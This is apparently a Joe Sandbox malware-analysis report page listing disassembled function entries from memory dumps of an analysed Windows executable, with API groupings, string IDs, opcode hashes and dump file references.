                                                                                Function 00007FF79F91AEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                • Instruction ID: fd9d475274250eb9234c95717a32f0e692fe216fa62ad2bf4fb4d06635cf1b97
                                                                                • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                • Instruction Fuzzy Hash: E33159366186D187E3709F25F894B9AB761EB887A0F509139EB9943B58CF3CD845CF10
                                                                                Function 00007FF79F8EFAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                • Instruction ID: eab5b74cd911fe89a850c0e196f5644f4fd29ca62b678c9f597d9b627e66da6f
                                                                                • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                • Instruction Fuzzy Hash: 95319F32A28A8682EB60BB34E4147B9B3A0EF85B78F900330DA7D467D4CF3CD4549711
                                                                                Function 00007FF79F8EF9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                • Instruction ID: 928d0a7fe9c0b348536b3fb5b8bd0b6aa595cbd75e7b8f7588672848dee7449c
                                                                                • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                • Instruction Fuzzy Hash: E2217122B28A8682E760AB34D4147B9A3A0EB85778F904335DA6E0A7D9DF7CD0149710
                                                                                Function 00007FF79F878F40 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                • String ID:
                                                                                • API String ID: 3220332590-0
                                                                                • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                • Instruction ID: 21447bdf453b05aa156398f72c3f260a55273c0f43d7577aaeeaf26fc7399d96
                                                                                • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                • Instruction Fuzzy Hash: 31A1E46BA1828385E7B4AF358444BFD73A0FF04B19F541435DE1987B94EA3DA861E330
                                                                                Function 00007FF79F89A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: f$p
                                                                                • API String ID: 3215553584-1290815066
                                                                                • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                • Instruction ID: 1af26e2e49cae61ed9aa571d9632d8bc0db29e7ada536ded916d1c5519d3ef73
                                                                                • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                • Instruction Fuzzy Hash: C5128529E0C1D3A6FBB0BA7490449F9E655EB40B74FD44231E699066C4DB3DF5E0BB20
                                                                                Function 00007FF79F8DAD30 Relevance: 9.2, APIs: 6, Instructions: 193memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                • String ID:
                                                                                • API String ID: 3859894641-0
                                                                                • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                                • Instruction ID: e3149d7d721177d8b6b60546f55ab28a7ea02a78dbebf1e448c26501b52d8932
                                                                                • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                                • Instruction Fuzzy Hash: 56716D61A0828291EAB8BF3595548FCE368FF44B90FA44037D74D4B796DF2CE971A321
                                                                                Function 00007FF79F8ED1F0 Relevance: 9.1, APIs: 6, Instructions: 131filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 564229958-0
                                                                                • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                • Instruction ID: d9c9fe5e38f2dc515baaa7a0667ae7f62b1379e7539c81081669c236a0133f3b
                                                                                • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                • Instruction Fuzzy Hash: F8515222A146C295EB70FF70D8407E9A364FF90784FC40032EA4C5769ADFA8E759D750
                                                                                Function 00007FF79F87D4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %.15g$0x%p$False$True
                                                                                • API String ID: 0-2263619337
                                                                                • Opcode ID: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
                                                                                • Instruction ID: e7aa18ff7bb9ed3a7b64a88df69128a686bbeb5b164ea17f90bd69ca93b21ad3
                                                                                • Opcode Fuzzy Hash: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
                                                                                • Instruction Fuzzy Hash: 0851C322F09A8285EB70EF35D440AFCA365EB45B88F948531CA0D47799CE39E455D360
                                                                                Function 00007FF79F871E04 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 2592858361-0
                                                                                • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                • Instruction ID: 34a36f1a19269c1bea5a4accf2a1a2fc6d785897398ac9e1d65040a0793fac70
                                                                                • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                • Instruction Fuzzy Hash: 4E51CF32A08AD286E770EB25D4847F9B760FB45BA4F804231DE5C47BA8CF3CE4519710
                                                                                Function 00007FF79F904C58 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                                • String ID:
                                                                                • API String ID: 383626216-0
                                                                                • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                                • Instruction ID: 9415b78a3eec4bb502247593af771cd3274162f2af5078b78e8dc9616ade2466
                                                                                • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                                • Instruction Fuzzy Hash: 0B318373B046918BE364EF75D8407EC73A1FB88758F540135EA0A57688DF38E559C750
                                                                                Function 00007FF79F8A1E74 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2082702847-0
                                                                                • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                • Instruction ID: dc4150ef9853ee1a3eb613030094cdbf8301a18e35b1607f75fd4ea56cf69191
                                                                                • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                • Instruction Fuzzy Hash: B3214225A0ABC281EEB5BB70A8145F9E290EF447B4F940734DA3D467D5DF3CD424DA20
                                                                                Function 00007FF79F9209FC Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                • Instruction ID: 4b4d92f401eb7eb61e5758379374c0893575519791a7cae0814138088b95f54b
                                                                                • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                • Instruction Fuzzy Hash: 0711B231B146D282E734AB25BC087E8AB50EB85BA4F894130CF0647B69CF7DE444C750
                                                                                Function 00007FF79F892D5C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                • Instruction ID: 9b76a65933ea03bd301d3ebede2032e2fef27c5bb8a7ff32a9f414829e548781
                                                                                • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                • Instruction Fuzzy Hash: 561152729056808AD358DF39DC481A97BB2FB58B08B958034C2498F265EF39D49EC710
                                                                                Function 00007FF79F8EDA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                • Instruction ID: 88b9915e620b24f253b258d76cff44bda5dae1b7df118f05123da61f73345b29
                                                                                • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                • Instruction Fuzzy Hash: 60018432B1478183EB20EB21FC44AA9B361FF89BA5F855034C90A4AB18DF3CD148CB00
                                                                                Function 00007FF79F8DF378 Relevance: 9.0, APIs: 6, Instructions: 33threadwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                • String ID:
                                                                                • API String ID: 179993514-0
                                                                                • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                • Instruction ID: 0dca0da65c5c25ea928a8073896b83e735a0739b0709d01e60c3a1061827d7cb
                                                                                • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                • Instruction Fuzzy Hash: D9F08121F1879143F764AB75BC48AF9A391BF88754FC54035D90E4AB58DF3CD0849B10
                                                                                Function 00007FF79F907E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 1653399731-2785691316
                                                                                • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                • Instruction ID: 59a7c73bee8d17fa0aa01e81cdaf816037e8a1c1a0e0efb4e97eb47d3230cf58
                                                                                • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                • Instruction Fuzzy Hash: C4B19C32A04A818AEB60EF71D4405EDB7B0FB847A8F940135EE4D83B58DF38E595CB50
                                                                                Function 00007FF79F90CDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF79F90BF47), ref: 00007FF79F90CE29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 2358735015-567219261
                                                                                • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                • Instruction ID: 452d63a8a626667da735da89ee8f87de877688649357d7db2253529daa766122
                                                                                • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                • Instruction Fuzzy Hash: 3A91C323B1969385EA74AF3684405F9A3B0BF147A4BD84532DA1DE3788DF3DE952C320
                                                                                Function 00007FF79F906920 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 212COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
